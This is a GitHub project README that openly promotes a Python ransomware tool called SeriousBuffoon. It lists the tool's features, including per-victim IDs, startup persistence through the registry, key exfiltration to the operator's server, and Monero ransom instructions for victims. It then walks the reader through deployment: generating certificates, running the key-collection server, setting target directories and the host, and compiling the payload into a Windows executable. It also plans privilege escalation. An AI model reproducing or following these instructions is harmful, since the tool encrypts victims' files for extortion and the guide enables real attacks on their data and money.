Probably the best Python ransomware available on Github
- 32 bits encryption key
- Multi threaded encryption/decryption
- Encrypt big files chunk by chunk (test on a 36 GB file)
- Scrap on real time the value of the XMR on https://www.coingecko.com/
- Can adapt depending of the processor
- Send decryption key through TLS
- Awesome GUI write with Tkinter with useful options
- Unique ID for each victim
- Victim can decrypt one file for free, to create a relationship of trust with the user
- The decryption key for the free file is different from the rest of files
- Change the wallpapper and get back the old one after the decryption
- GUI with Timer
- Easily customisable with "const.py" file
- Create register KEY for launch the ransomware at every start up
- Clean itself, the ransomware delete all files after the decryption
- Tell the user how to buy moneros
- Works on Windows 10 and Windows 11
+> cd SeriousBuff00n/Server/
+> ./auto_cert_gen.sh
+> Edit server.py
and the variables KEYFILE
and CERTIFICATE
by setting the path of these files
+> Edit your IP
and PORT
+> Run the server by taping python3 server.py
. ( Maybe you'll need to install termcolorpip3 install termcolor
)
+> cd SeriousBuffoon/Bin
+> create virtual env : py -m venv .venv
+> activate the virtual env: .\.venv\Scripts\activate
+> install libs: pip3 install -r ..\ressource\requierements.txt
+> Edit the const.py
file and the variable : DIR_TO_HIT
to set where SeriousBuffoon should encrypt
+> Edit the const.py
file and the variable : HOST
,PORT
to set your server and port
+> Compile the ransomware by type : pyinstaller build.spec
+> You will find the .exe in SeriousBuff00n/Bin/dist
folder
Enjoy <3
- Add a database (SQL)
- Bypass permission / Privileges Escalation (WinPwnage)
- Compatible with linux
- Find another way to check if ransomware had already ran
- Try to just cut the file and past it to another dir
- Go to
C:\Users\User\AppData\Local\Microsoft\Windows\Explorer
. Select all files that begin with iconcache and thumbcache and delete all these files - Go to
C:\Users\user\AppData\Local
and deleteIconCache.db
- In production edit the
EMAIL
,MONERO_ADDRESS
andPRICE_MONERO_EUR
inconst.py
. - Add some files extensions on
encryption/encrypt.py
line 26. - You can modify the
build.spec
if you want change the behaviour of the ransomware
Monero : 8AjPMwYakhxVfStZzKW34JNJD8Jnr3vBQ4CnTzcfRymNXJHUuZ4nRitT2nShynZzzpNXjRKofinL9BLYsQme1yiTDWyKT6r